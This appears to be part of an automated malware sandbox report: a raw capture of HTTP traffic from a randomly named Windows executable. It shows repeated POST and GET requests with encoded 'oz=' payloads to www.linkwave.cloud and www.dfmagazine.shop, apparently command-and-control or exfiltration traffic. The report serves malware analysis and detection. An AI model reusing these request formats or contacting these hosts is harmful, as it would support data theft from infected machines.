                                                                                                                                              Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 50 4c 53 58 46 45 78 43 32 74 78 30 30 41 5a 42 45 75 4c 2f 44 33 49 56 43 69 66 46 30 7a 34 4e 31 73 30 35 4e 7a 48 5a 72 30 51 41 53 42 71 52 2b 49 56 45 6e 76 6a 6f 61 74 4d 52 50 47 62 45 62 6d 59 39 74 33 45 47 30 6e 6b 45 51 76 66 37 52 32 53 68 2b 73 38 43 54 45 43 67 41 76 63 39 38 57 61 56 74 6b 6d 69 73 37 6f 4d 55 6a 38 37 6b 6c 34 4d 69 6f 31 52 63 79 61 30 4d 43 42 63 2b 72 42 68 6d 56 70 54 38 2b 65 52 2b 2f 53 69 34 61 6f 2b 51 5a 4a 67 2f 4f 33 39 6a 72 67 61 4f 42 36 75 48 50 56 44 2b 66 46 36 6b 3d
                                                                                                                                              Data Ascii: oz=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+PLSXFExC2tx00AZBEuL/D3IVCifF0z4N1s05NzHZr0QASBqR+IVEnvjoatMRPGbEbmY9t3EG0nkEQvf7R2Sh+s8CTECgAvc98WaVtkmis7oMUj87kl4Mio1Rcya0MCBc+rBhmVpT8+eR+/Si4ao+QZJg/O39jrgaOB6uHPVD+fF6k=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              8192.168.11.20497383.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:37.880976915 CEST2578OUTPOST /was5/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Origin: http://www.linkwave.cloud
                                                                                                                                              Referer: http://www.linkwave.cloud/was5/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 48 4c 53 45 4e 45 77 6c 61 74 77 30 30 41 51 68 45 56 4c 2f 44 32 49 52 75 75 66 46 34 4a 34 4c 78 73 6d 50 52 7a 50 4d 48 30 61 41 53 42 33 42 2b 4a 49 55 6e 66 6a 6f 4b 70 4d 52 66 47 62 45 62 6d 59 38 39 33 43 55 51 6e 69 45 51 67 63 37 52 71 46 78 2b 49 38 43 37 2b 43 68 42 59 64 4e 63 57 62 31 39 6b 6b 55 41 37 31 38 55 68 39 37 6b 39 34 4d 2b 4a 31 52 51 45 61 30 34 34 42 66 4f 72 41 41 50 36 37 58 6f 39 4c 42 71 39 59 7a 45 58 6b 38 5a 48 4a 44 7a 73 33 72 7a 64 68 66 47 4d 37 76 48 75 53 69 6e 55 53 2b 4d 51 73 67 65 77 4f 49 50 76 52 2f 51 45 58 54 2f 61 52 65 67 70 55 6c 42 33 52 59 66 6b 61 58 6b 6f 36 57 45 48 66 78 54 45 78 36 4f 2b 6d 71 44 6c 43 6e 34 53 52 66 57 6e 71 47 57 70 67 73 51 41 6e 56 35 65 55 33 6a 56 49 69 36 2b 77 43 55 4c 58 6e 37 59 44 51 41 59 36 2f 37 73 43 50 6b 78 35 7a 49 4a 56 50 67 62 43 38 64 67 62 47 4c 43 66 7a 6b 70 31 52 57 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+HLSENEwlatw00AQhEVL/D2IRuufF4J4LxsmPRzPMH0aASB3B+JIUnfjoKpMRfGbEbmY893CUQniEQgc7RqFx+I8C7+ChBYdNcWb19kkUA718Uh97k94M+J1RQEa044BfOrAAP67Xo9LBq9YzEXk8ZHJDzs3rzdhfGM7vHuSinUS+MQsgewOIPvR/QEXT/aRegpUlB3RYfkaXko6WEHfxTEx6O+mqDlCn4SRfWnqGWpgsQAnV5eU3jVIi6+wCULXn7YDQAY6/7sCPkx5zIJVPgbC8dgbGLCfzkp1RWZbUpoul2vc17ArWAjBP8FoMzVOCl6NYqLATUjhhsAGGY5YGJmgD67ARbJx/xPYVSllGqJOHFuUhncOyl9kYBYbtMPu/xo3yURGubxTnumY40ICfHCan67lyOchR3Z8Yx2jKdHacyA7GhH/eLAY4O29H5p8E8IqlQEKsFERb9iiQbA5Pb9mjbOH6HlLcoLKGr9//y6yQMh07ucAJnJSYRueumSZaYBBXoTXT3/OzcU0NQuSzFZHOVUKYXM0MbtC7NNohE9C9ZvH9IVgGkPgHtiN0ZRUKEBxqr29bui9ZNJIpUDQ/lF2QhTh/3IOrSnOagAlKPTmNtz/LGJ1BOM+SE1btf43VutQ3EcgxBbkzzLdVUJOS8K9xyZx40HF3TShVi15eJRk0OF9u6tzO4IB9x3QVl8W4lyF7AhPTYs3WlMoUuabsSQYsSysuW4nlbqn/rL9TZcgZuKLEr9NS3uq+eyoopr6cGjYfT5Dx+uDZsxzrlmczYDgbJzp/Kq+/HxuQX1KGmCBZ3xx8aY78FuXHuQ0GO/CZtJ1wu/tpkOdUbaUz8MxLiwmjJxbEGY2UxgAxu/oAIoh6JNJXEJl/l/dZieKHtIHooJMYBtaHPs2y1J/Dvqs34p765yBU42JUb2OaERxKzwbsJXCzcCGqiI48DIlbl2Ja8Ib2xKg [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:07:37.881028891 CEST2578OUTData Raw: 6c 6f 63 38 69 41 55 45 56 43 43 53 6c 62 73 46 4d 54 41 30 34 70 37 36 48 6b 43 70 6a 64 30 51 63 5a 6c 67 6b 76 59 56 34 38 6a 78 57 35 52 73 4c 64 59 30 32 38 35 69 6e 64 4b 48 53 38 55 50 75 76 34 47 78 54 74 34 31 75 75 56 46 34 68 44 79 36
                                                                                                                                              Data Ascii: loc8iAUEVCCSlbsFMTA04p76HkCpjd0QcZlgkvYV48jxW5RsLdY0285indKHS8UPuv4GxTt41uuVF4hDy6ae0fTtm6B5iPVCYUQCgyB6Fiql4KIygFFDdKE1R0a1d9sYRglwbaLIUck00YhTXFMxNIwVZYD8gMcbNrBqSlwBfQLaGl5AjPcvVzn0Ir+XGPo+PQ0lR8GocHeyKDI4a/W3EZx8TZeAW5VGfXhTq3OlVE4NU2mDNVE
                                                                                                                                              Oct 4, 2024 08:07:37.881047964 CEST2826OUTData Raw: 77 2b 50 48 5a 51 77 5a 62 45 45 72 48 4b 54 70 46 32 74 77 30 42 42 54 4d 44 59 47 37 4c 31 5a 4e 2f 4e 6c 45 51 37 35 33 70 4a 4e 43 77 37 74 77 73 65 75 55 4f 48 7a 54 7a 4a 57 50 79 47 2f 6c 44 6f 55 77 6a 58 35 41 37 56 6f 34 61 58 36 50 4e
                                                                                                                                              Data Ascii: w+PHZQwZbEErHKTpF2tw0BBTMDYG7L1ZN/NlEQ753pJNCw7twseuUOHzTzJWPyG/lDoUwjX5A7Vo4aX6PNnzm3l7Cn/f8KtFTQ4Knwg1l4TsXOSipjAsgVS3tCVHaeq07CvwLAw9SGkVy85wAxKLfX2UrBD7ZhW+NncaqlSaUxyQs/QytYrUO/gA0Y8gjf0oIoKTnQ3mgmHoiftH9LNJp7ukCcpY6xQ+R5nwnPO6fKzfcD2PfZZ


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              9192.168.11.20497393.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:40.522816896 CEST549OUTGET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:07:40.629918098 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:07:40 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 7a 3d 79 38 4d 6e 44 33 43 41 55 6a 66 76 6c 62 43 61 78 41 56 61 63 36 33 47 76 4b 36 38 68 79 77 6b 56 51 63 6b 30 46 30 33 4d 4d 72 61 43 51 64 50 36 69 36 61 68 67 45 63 4b 53 39 39 53 38 6a 43 4d 41 66 52 64 31 45 67 76 59 42 49 6b 49 31 67 46 72 32 4a 4e 52 79 6d 6b 78 66 37 4b 55 72 50 69 62 69 71 49 7a 4b 34 50 43 4b 67 51 4e 39 71 48 69 77 56 6e 44 30 3d 26 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              10192.168.11.204974084.32.84.32804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:45.955713034 CEST816OUTPOST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4d 70 75 50 44 42 76 4e 76 79 58 6c 30 6a 39 37 54 75 33 75 5a 4d 79 45 35 75 36 65 41 72 77 41 33 49 7a 2f 64 67 6d 35 78 76 39 39 4f 59 7a 75 46 70 47 77 2b 77 61 6c 61 6e 71 4a 41 69 64 2f 70 6d 44 43 34 79 34 72 48 43 44 69 41 56 41 32 6d 50 73 69 36 58 6f 74 42 6d 35 63 65 34 44 31 72 6a 73 31 38 42 70 49 61 6e 4a 55 47 70 77 79 55 45 4b 76 44 33 46 69 70 74 4a 42 62 71 6b 56 79 57 34 4b 34 4a 62 4e 43 68 56 77 4f 36 55 75 55 78 72 36 39 34 54 35 6c 38 54 52 32 41 32 52 70 77 30 56 64 6f 34 38 4d 42 44 45 66 38 52 35 50 49 65 4a 52 77 3d 3d
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              11192.168.11.204974184.32.84.32804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:48.583812952 CEST836OUTPOST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 49 41 77 6f 44 2f 63 68 6d 35 30 76 39 39 4a 6f 7a 76 42 70 47 2f 2b 77 65 74 61 6d 57 4a 41 69 4a 2f 70 6d 54 43 35 44 34 6f 42 53 44 67 50 31 41 30 70 76 73 69 36 58 6f 74 42 6e 64 32 65 34 4c 31 6f 54 63 31 75 77 70 48 5a 6e 4a 62 4d 4a 77 79 44 30 4b 72 44 33 45 4e 70 73 55 6b 62 76 34 56 79 58 49 4b 35 62 7a 4f 49 68 56 36 45 61 56 35 54 51 79 4b 34 4d 32 4d 6b 39 4b 44 2f 6c 4b 4d 73 6d 6c 50 41 61 4d 59 50 53 66 32 62 4d 6f 52 4e 4b 66 53 4d 36 58 76 33 7a 54 50 36 4c 58 79 77 53 67 61 74 32 4d 54 37 70 67 3d
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              12192.168.11.204974284.32.84.32804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:51.232670069 CEST2578OUTPOST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 41 41 77 62 4c 2f 64 47 61 35 33 76 39 39 4b 6f 7a 79 42 70 47 69 2b 32 32 70 61 6d 62 2b 41 67 78 2f 6d 6c 4c 43 2b 77 67 6f 50 53 44 67 58 31 41 33 6d 50 73 33 36 54 30 68 42 6d 74 32 65 34 4c 31 6f 51 45 31 74 68 70 48 56 48 4a 55 47 70 77 2b 55 45 4b 50 44 33 4d 33 70 73 51 61 63 62 30 56 79 33 59 4b 30 50 54 4f 45 68 56 38 48 61 56 78 54 51 4f 56 34 49 66 31 6b 39 50 59 2f 6a 75 4d 74 78 67 70 5a 49 4a 50 64 41 6e 47 52 63 55 51 45 34 57 43 44 72 44 57 78 41 33 5a 7a 2b 66 45 38 53 63 4d 39 33 63 34 35 75 75 6e 61 61 5a 66 45 4e 64 75 77 68 2b 67 69 7a 72 53 4d 4e 2b 4a 4c 6c 67 32 42 38 6b 6b 6d 2f 58 2b 63 76 75 4e 76 6c 63 64 59 4f 52 4b 54 54 6e 4d 47 6d 4a 62 34 57 69 79 38 35 57 49 4c 30 66 43 54 42 42 30 33 44 46 78 32 74 6a 38 65 52 6b 51 51 43 77 56 73 68 2f 63 34 37 4e 51 78 5a 78 53 71 51 4c 48 78 51 51 47 58 38 55 35 51 79 71 4a 47 48 54 2b 64 2f 31 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdAAwbL/dGa53v99KozyBpGi+22pamb+Agx/mlLC+wgoPSDgX1A3mPs36T0hBmt2e4L1oQE1thpHVHJUGpw+UEKPD3M3psQacb0Vy3YK0PTOEhV8HaVxTQOV4If1k9PY/juMtxgpZIJPdAnGRcUQE4WCDrDWxA3Zz+fE8ScM93c45uunaaZfENduwh+gizrSMN+JLlg2B8kkm/X+cvuNvlcdYORKTTnMGmJb4Wiy85WIL0fCTBB03DFx2tj8eRkQQCwVsh/c47NQxZxSqQLHxQQGX8U5QyqJGHT+d/1dPE3YcYiFDAHq0DcYLr9xKKlqrotLKHPtKM3cUJDPz8N9d7wzaNc356vNlW8JILLWvNYqTBj3RV+gFZiJyqngSgDpxaog+vgA6KG/lbnEMIrHbpK0uNnpVteKyfA9Zmyr5a3BKvP43ZifrqUi31IXdPfLvVridjP6/pZnYlEcMr0lLxjkYsahQFuUgzz+39UA/+6f2MblZHYFBmUPiZPImuLVet19ORlRz9XgwkrY4TIhqOEzmXe+fGqPJTUfycYt6a+TpndN3VJcdJUEtR+T+kP0RDwru2HPFUWXzmgo3RuaLhVM3gvg/2Y+uwf8FOQDiMz7+GNAH+fuO6nOSDKU/awjbIUWZF1GFSpm9RuZ028bC902hqSomWouNJCKYh1Lk5yn8hN2six9bbofsycXfCKa5vCjADBdyXl1AVFwlVusfCsZov6jJ9isUf5WlrbayYUQ/VCINmeIHKZfccDvxclR8pSQzO3eO7q71Ob0M6iY5ZTixCWYfuznMRNtcttdbHfnc21pOvTAQgUbhIMvFp3D1w6Fx8KH+OdTusBicK4RT326in5gRywGs6gzwsqvyPTMRzOHF2qTxtzQrHaS/mulbQi8RI+d54WQF6YhyWZgutdBVZVeBoKDRJRs2cXuYwuo7IoXHmUOOLlGJRpexl2jt1qS7gNeO [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:07:51.232721090 CEST5407OUTData Raw: 69 4d 6d 39 49 54 34 4b 4c 49 61 50 62 45 37 61 55 35 4f 7a 6f 78 71 42 35 34 76 75 2f 6e 53 72 36 4d 38 44 4f 62 4d 58 51 6f 49 6d 6e 61 5a 2f 35 30 4d 51 67 75 73 64 37 77 31 63 4a 55 63 45 35 69 65 4f 76 68 62 65 46 53 31 46 48 41 64 55 59 34
                                                                                                                                              Data Ascii: iMm9IT4KLIaPbE7aU5OzoxqB54vu/nSr6M8DObMXQoImnaZ/50MQgusd7w1cJUcE5ieOvhbeFS1FHAdUY4cGV5K5X8Iz2r0ZyZNEx/2BV3pNKSgZpnlqqVY2ZttHqIXiPHcDbQmdy4WpHfysFraQGtyy5NdMulyMOTrXmG+OybZgnPxk5SXeqfvb1Bx+uoCqGxE/lHcvw7Pbg8CM6OSVWfscA/6vkfDzR035+2ImhOzbd/Q29T1


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              13192.168.11.204974384.32.84.32804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:07:53.860101938 CEST550OUTGET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:07:53.960364103 CEST1289INHTTP/1.1 200 OK
                                                                                                                                              Server: hcdn
                                                                                                                                              Date: Fri, 04 Oct 2024 06:07:53 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 10072
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              x-hcdn-request-id: 04f112d035d143747d32d4acfc7a398b-bos-edge2
                                                                                                                                              Expires: Fri, 04 Oct 2024 06:07:52 GMT
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                                                                                              Oct 4, 2024 08:07:53.960510969 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                                                                                              Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                                                                                              Oct 4, 2024 08:07:53.960628033 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                                                                                              Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                                                                                              Oct 4, 2024 08:07:53.960762024 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                                                                                              Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                                                                                              Oct 4, 2024 08:07:53.960921049 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
